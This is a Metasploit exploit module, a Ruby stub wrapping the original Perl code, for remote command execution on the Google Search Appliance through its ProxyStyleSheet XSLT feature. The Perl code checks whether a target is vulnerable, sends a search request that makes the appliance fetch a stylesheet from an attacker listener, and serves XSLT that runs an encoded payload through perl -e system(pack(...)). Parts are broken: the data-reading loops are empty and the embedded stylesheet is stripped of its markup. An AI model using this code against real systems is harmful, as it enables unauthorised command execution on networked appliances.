require 'msf/core'

# Metasploit 3 (Ruby) skeleton wrapped around the original Msf2 (Perl)
# module.  The class name is still the generator's placeholder and the
# Ruby `exploit` method does nothing beyond connect/handler/disconnect;
# the working logic is the Perl source preserved verbatim inside the
# =begin/=end block further down.
module Msf
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
include Exploit::Remote::Tcp

# Registers module metadata (name, description, reference, payload
# constraints and a single catch-all target) with the framework.
def initialize(info = {})
super(update_info(info,
  'Name' => 'Google Appliance ProxyStyleSheet Command Execution',
  'Description' => %q{ This module exploits a feature in the Saxon XSLT parser used by the Google Search Appliance. This feature allows for arbitrary java methods to be called. Google released a patch and advisory to their client base in August of 2005 (GA-2005-08-m). The target appliance must be able to connect back to your machine for this exploit to work. },
  'Author' => [ 'hdm' ],
  'Version' => '$Revision$',
  'References' => [ [ 'OSVDB', '20981'], ],
  'Privileged' => false,
  # 1024 bytes matches the 'Space' limit declared in the Perl $info below.
  'Payload' => { 'Space' => 1024, 'BadChars' => "", },
  # 'Platform' => 'any' and 'Ret' => 0x0 are skeleton placeholders; the
  # Perl module's only target is a bare name.
  'Targets' => [ [ 'Automatic Targetting', { 'Platform' => 'any', 'Ret' => 0x0, }, ], ],
  'DisclosureDate' => 'Aug 16 2005',
  'DefaultTarget' => 0))
end

# Stub: opens the TCP connection, starts the payload handler and
# disconnects without sending any request.  This is not a port of the
# Perl Exploit sub below.
def exploit
connect
handler
disconnect
end

=begin
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::google_proxystylesheet_exec;
use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket;
use IO::Select;
# NOTE(review): 'use warnings' is not enabled, and Pex::Utils and
# Msf::Socket::Tcp are called below without being loaded here --
# presumably made available through Msf::Exploit; verify.

my $advanced = { };

# Module metadata handed to Msf::Exploit by new() below.
my $info = {
    'Name' => 'Google Appliance ProxyStyleSheet Command Execution',
    'Version' => '$Revision$',
    'Authors' => [ 'H D Moore ' ],   # contact address appears to have been lost in extraction
    'Description' => Pex::Text::Freeform(qq{ This module exploits a feature in the Saxon XSLT parser used by the Google Search Appliance. This feature allows for arbitrary java methods to be called. Google released a patch and advisory to their client base in August of 2005 (GA-2005-08-m). The target appliance must be able to connect back to your machine for this exploit to work. 
}),
    'Arch' => [ ],
    'OS' => [ ],
    'Priv' => 0,
    'UserOpts' => {
        'RHOST' => [ 1, 'HOST', 'The address of the Google appliance'],
        'RPORT' => [ 1, 'PORT', 'The port used by the search interface', 80],
        # Callback listener: binds every interface (0.0.0.0) unless HTTPHOST
        # is set.  HTTPADDR is the address written into the stylesheet URL
        # the appliance is asked to fetch.
        'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ],
        'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
        'HTTPADDR' => [ 0, 'HOST', 'The address that can be used to connect back to this system'],
    },
    'Payload' => { 'Space' => 1024, 'Keys' => [ 'cmd' ], },
    'Refs' => [ ['OSVDB', 20981], ],
    'DefaultTarget' => 0,
    'Targets' => [ [ 'Google Search Appliance'] ],
    'Keys' => [ 'google' ],
    'DisclosureDate' => 'Aug 16 2005',
};

# Constructor: passes $info/$advanced to Msf::Exploit->new together with
# any caller-supplied arguments.
sub new {
    my $class = shift;
    my $self;
    $self = $class->SUPER::new(
        {
            'Info'     => $info,
            'Advanced' => $advanced,
        },
        @_);
    return $self;
}

# Check: sends one search request whose proxystylesheet parameter names a
# random (unresolvable) host and classifies the appliance by the error
# text it returns.  Only the "cannot be resolved" wording yields
# 'Confirmed'; the "patched" wording and every other response end in
# 'Safe'.  Returns 'Connect' when the search port cannot be reached.
sub Check {
    my $self = shift;
    my $s = $self->ConnectSearch;
    if (! $s) {
        return $self->CheckCode('Connect');
    }
    # client/site/q are random alphanumerics; proxystylesheet names a random host.
    my $url =
        "/search?client=". Pex::Text::AlphaNumText(int(rand(15))+1). "&".
        "site=".Pex::Text::AlphaNumText(int(rand(15))+1)."&".
        "output=xml_no_dtd&".
        "q=".Pex::Text::AlphaNumText(int(rand(15))+1)."&".
        "proxystylesheet=http://".Pex::Text::AlphaNumText(int(rand(32))+1)."/";
    $s->Send("GET $url HTTP/1.0\r\n\r\n");
    my $page = $s->Recv(-1, 5);   # presumably (length, timeout) -- confirm against Msf::Socket::Tcp
    $s->Close;
    if ($page =~ /cannot be resolved to an ip address/) {
        $self->PrintLine("[*] This system appears to be vulnerable >:-)");
        return $self->CheckCode('Confirmed');
    }
    if ($page =~ /ERROR: Unable to fetch the stylesheet/) {
        $self->PrintLine("[*] This system appears to be patched");
    }
    # Reached from the "patched" branch as well as the default case.
    $self->PrintLine("[*] This system does not appear to be vulnerable");
    return $self->CheckCode('Safe');
}

# Exploit flow:
#   1. GET / and parse the redirect for the appliance's site= and client= values;
#   2. open a local TCP listener on HTTPHOST:HTTPPORT;
#   3. send a search whose proxystylesheet URL points back at that listener;
#   4. wait up to 30 s for the appliance to fetch the stylesheet and hand
#      the accepted connection to ProcessHTTP.
# What a defender can observe: a search request whose proxystylesheet=
# parameter names an external URL, followed by the appliance making an
# outbound HTTP fetch to that address.
sub Exploit {
    my $self = shift;
    my ($s, $page);

    # Request the index page to obtain a redirect response
    $s = $self->ConnectSearch || return;
    $s->Send("GET / HTTP/1.0\r\n\r\n");
    $page = $s->Recv(-1, 5);
    $s->Close;

    # Parse the redirect to get the client and site values
    # (expects a Location header whose query carries site=...& before client=...&)
    my ($goog_site, $goog_clnt) = $page =~ m/^location.*site=([^\&]+)\&.*client=([^\&]+)\&/im;
    if (! $goog_site || ! $goog_clnt) {
        $self->PrintLine("[*] Invalid response to our request, is this a Google appliance?");
        return;
    }

    # Create the listening local socket that will act as our HTTP server
    my $lis = IO::Socket::INET->new(
        LocalHost => $self->GetVar('HTTPHOST'),
        LocalPort => $self->GetVar('HTTPPORT'),
        ReuseAddr => 1,
        Listen    => 1,
        Proto     => 'tcp');
    if (not defined($lis)) {
        $self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
        return;
    }
    my $sel = IO::Select->new($lis);

    # Send a search request with our own address in the proxystylesheet parameter
    my $query = Pex::Text::AlphaNumText(int(rand(32))+1);
    # HTTPADDR wins when set; otherwise the local address that routes to RHOST is used.
    my $proxy = "http://".
        ($self->GetVar('HTTPADDR') || Pex::Utils::SourceIP($self->GetVar('RHOST'))).
        ":".$self->GetVar('HTTPPORT')."/".Pex::Text::AlphaNumText(int(rand(15))+1).".xsl";
    my $url = "/search?client=". $goog_clnt ."&site=". $goog_site .
        "&output=xml_no_dtd&proxystylesheet=". $proxy . "&q=". $query ."&proxyreload=1";

    $self->PrintLine("[*] Sending our malicious search request...");
    $s = $self->ConnectSearch || return;
    $s->Send("GET $url HTTP/1.0\r\n\r\n");
    $page = $s->Recv(-1, 3);   # response is read but not examined further
    $s->Close;

    $self->PrintLine("[*] Listening for connections to http://" . $self->GetVar('HTTPHOST') . ":" . $self->GetVar('HTTPPORT') . " ...");

    # Did we receive a connection?  (waits up to 30 seconds)
    my @r = $sel->can_read(30);
    if (! @r) {
        $self->PrintLine("[*] No connection received from the search engine, possibly patched.");
        $lis->close;
        return;
    }

    # NOTE(review): the first peer to connect is accepted, whoever it is --
    # the peer address is never compared with RHOST -- and $lis is not
    # closed on this path.
    my $c = $lis->accept();
    if (! $c) {
        $self->PrintLine("[*] No connection received from the search engine, possibly patched.");
        $lis->close;
        return;
    }
    my $cli = Msf::Socket::Tcp->new_from_socket($c);
    $self->PrintLine("[*] Connection received from ".$cli->PeerAddr."...");
    $self->ProcessHTTP($cli);
    return;
}

# Opens the TCP connection to RHOST:RPORT used for every search request;
# prints the socket error and returns undef on failure.
# NOTE(review): 'SSL' is read via GetVar but is not declared in UserOpts above.
sub ConnectSearch {
    my $self = shift;
    my $s = Msf::Socket::Tcp->new(
        'PeerAddr' => $self->GetVar('RHOST'),
        'PeerPort' => $self->GetVar('RPORT'),
        'SSL'      => $self->GetVar('SSL')
    );
    if ($s->IsError) {
        $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
        return;
    }
    return $s;
}

# Serves the stylesheet to the appliance that connected back: reads the
# request line, builds the command string, substitutes it into the
# template stored after __DATA__ and returns it in an HTTP/1.1 200 response.
sub ProcessHTTP {
    my $self = shift;
    my $cli = shift;
    # $targetIdx/$target/$ret/$shellcode are assigned but never used below.
    my $targetIdx = $self->GetVar('TARGET');
    my $target = $self->Targets->[$targetIdx];
    my $ret = $target->[1];
    my $shellcode = $self->GetVar('EncodedPayload')->Payload;
    my $content;
    my $rhost;
    my $rport;

    # Read the first line of the HTTP request
    # ($cmd/$url/$proto are split out but not validated or referenced again)
    my ($cmd, $url, $proto) = split(/ /, $cli->RecvLine(10));

    # The way we call Runtime.getRuntime().exec, Java will split
    # our string on whitespace. Since we are injecting via XSLT,
    # inserting quotes becomes a huge pain, so we do this...
    my $exec_str = '/usr/bin/perl -e system(pack(qq{H*},qq{' .
        unpack("H*", $self->GetVar('EncodedPayload')->RawPayload). '}))';

    # Load the template from our data section, we have to manually
    # seek and reposition to allow the exploit to be used more
    # than once without a reload.
    # NOTE(review): both 'while()' loops below have an empty condition;
    # the <DATA> readline operand appears to have been stripped in extraction.
    seek(DATA, 0, 0);
    while() { last if /^__DATA__$/ }
    while() { $content .= $_ }

    # Insert our command line
    # (the :x:MSF:x: placeholder is not visible in the stripped data section below)
    $content =~ s/:x:MSF:x:/$exec_str/;

    # Send it to the requesting appliance
    $rport = $cli->PeerPort;
    $rhost = $cli->PeerAddr;
    $self->PrintLine("[*] HTTP Client connected from $rhost, sending XSLT...");
    my $res =
        "HTTP/1.1 200 OK\r\n" .
        "Content-Type: text/html\r\n" .
        "Content-Length: " . length($content) . "\r\n" .
        "Connection: close\r\n" .
        "\r\n" .
        $content;
    $self->PrintLine("[*] Sending ".length($res)." 
bytes...");
    $cli->Send($res);
    $cli->Close;
}

1;

# The default Google Mini style sheet is included below, with a few modifications to
# the my_page_footer template.
# (Only text nodes survive in this copy; the XSLT markup was stripped in extraction.)
__DATA__
1 images/Title_Left.gif 200 78 arial,sans-serif #ffffff #000000 #0000cc #551a8b #ff0000 both 1 Advanced Search 1 Search Tips 1 1 32 text Google Search 1 blue 0 google right -1 #6f6f6f 0 1 Did you mean: #cc0000 1 You could also try: #cc0000 1 KeyMatch #2255aa #e8e8ff 1 #0000cc 1 80% b 1 #008000 -1 1 1 1 1 #6f6f6f 0 Search Home Search Results Advanced Search Error both This is the cached copy of Unknown XML result type. View page source to see the offending XML. #cbdced XSLT Version:
XSLT Vendor:
XSLT URL:
OS:
Version:
Arch:
UserName:
UserHome:
UserDir:
Executing command...
Go to Search Home



#3366cc #ffffff
.

<xsl:value-of select="$front_page_title"/>

Your search - - did not match any documents.
No pages were found containing "".

Suggestions:
  • Make sure all words are spelled correctly.
  • Try different keywords.
  • Try more general keywords.
/basics.html =& /search?&proxycustom=<HOME/> = & = & = & /search? = & filter= /search?&proxycustom=<ADVANCED/> + p <xsl:value-of select="$adv_page_title"/>
Advanced Web Search

Find results
with all of the words <input type="text" name="as_q" size="25" value=" ">
with the exact phrase <input type="text" name="as_epq" size="25" value=" ">
with any of the words <input type="text" name="as_oq" size="25" value=" ">
without the words <input type="text" name="as_eq" size="25" value=" ">
Language Return pages written in <select name="lr"> <select name="lr" onchange="javascript:collecturl('/search', 'adv');"> </select>
Occurrences Return results where my terms occur
Domains return results from the site or domain
e.g. google.com, .org
Sort
Security Search public content only Search public content only Search public and secure content (login required) Search public and secure content (login required)


Page-Specific Search
Links Find pages that link to the page
<xsl:value-of select="$result_page_title"/>: <xsl:value-of disable-output-escaping="yes" select="$html_escaped_query"/>
<input type="text" name="q" size=" " maxlength="256" value=" ">
Search: public content public content public and secure content public and secure content


= & &sort=date%3AD%3AS%3Ad1
Sort by: Date / Relevance Date / Relevance

In order to show you the most relevant results, we have omitted some entries very similar to the already displayed.
If you like, you can repeat the search with the omitted results included.

simple

<blockquote>

[TEXT] [RTF] [PDF] [PS] [MS POWERPOINT] [MS EXCEL] [MS WORD] [] <a href=""> </a>

Not Indexed:
[ More results from ]

</blockquote>


< > <font size=" " color=" " > </font> </ >
Description:
- - - Cached Cached Cached Text Version s b <center> <div class="n">
ResultPage:
< Previous


Next >

</div> </center>


Searched for . Results - of about . Search took seconds.



Powered by Google

&nbsp; &quot; &copy; <head> </head> <head> </head> <xsl:value-of select="error_page_title"/> <xsl:value-of select="$error_page_title"/>: <xsl:value-of select="$errorMessage"/> :



=end
end # class Exploits::Windows::XXX_CHANGEME_XXX
end # module Msf